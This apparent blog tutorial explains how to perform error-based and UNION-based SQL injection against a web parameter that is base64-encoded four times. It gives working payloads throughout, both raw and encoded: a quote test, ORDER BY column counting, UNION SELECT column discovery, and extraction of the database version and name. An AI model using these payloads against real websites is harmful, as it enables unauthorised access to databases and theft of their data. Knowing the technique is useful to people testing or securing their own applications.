This article is a guide to perform SQL Injection on the Base64 encoded Url parameters. These parameters are encoded so as to make the site injection proof but that is a big myth.
Recently I came across “www.somesite.com/index.php?pid=VkRGRk9WQlJQVDA9″ this kind of URLs. The pid here, “VkRGRk9WQlJQVDA9“. It is nothing but 4 times encoded base64 string, which when you decode, you will get 9 as the number pid.
Let’s see how we can inject in such URLs parameter:
I am using http://www.utilities-online.info/base64/#.W8gPD4hX5PY site to encode my injection strings to base64 four times.
First: Since we know that this VkRGRk9WQlJQVDA9 is 9 we can use quote 9′ and encode this to VkRGT2FsQlJQVDA9 to check if the parameter leads us to the SQL error.
Now, we know it is basic SQL Injection Error based now. All we need to do is encode the string four times with base64.
9′ order by 1– –
Encoded: VkRGT2Fsb3lTWHBUYlhSaFYwVnNibGRYTlhKYU1ERlVUVWhTU2xGNlFUaz0=
This loaded the page correctly, thus means we have 1 column.
9′ order by 4– –
Encoded: VkRGT2Fsb3lTWHBUYlhSaFYwVnNibGRYTlhKYU1EVkVUVWhTU2xGNlFUaz0=
The page loaded correctly again
let’s try 8
9′ order by 8– –
Encoded: VkRGT2Fsb3lTWHBUYlhSaFYwVnNibGRYTlhKYU1EbEVUVWhTU2xGNlFUaz0=
Gave me error.
Then I tried order by 7 and it worked.
So We know now that we have got 7 columns.
Let’s find out the vulnerable columns using UNION query:
-1′ UNION SELECT 1,2,3,4,5,6,7– –
Encoded: VkVaU1JtSnJiRWRXYXpsVVZsUnNVRk5WV2s5U2JGSkdWbXRTVjFFd1JqUlVSVkpLWXpBeE5XUjZRazFTUmxaNlZHMXNNMDB3ZUZSTlIyUk5WVlF3T1E9PQ=
Gave me the above columns now we know that they are vulnerable.
-1′ union select 1,2,VERSION(),database(),5,6,7– –
Encoded: VkVaU1JtSnJiRWxXYmxab1ZucHNNVk5WYUU5aVIwcElWbTF3YTFFd1JqUlVSVkpLWXpGYWNsWnNUbFpOUjNoUlZrZHNibU5GZUVoVmJXaHJVakJhY0ZkV2FFOWlSWFJFWVROT1QxVXpZM2xVUlZKcVpFVjRWRkZZVVQwPQ
I have hidden the database name.
This is how we can do SQL Injection on base64 encoded string values. I am leaving this on version query only, But we can perform stuff more than just this.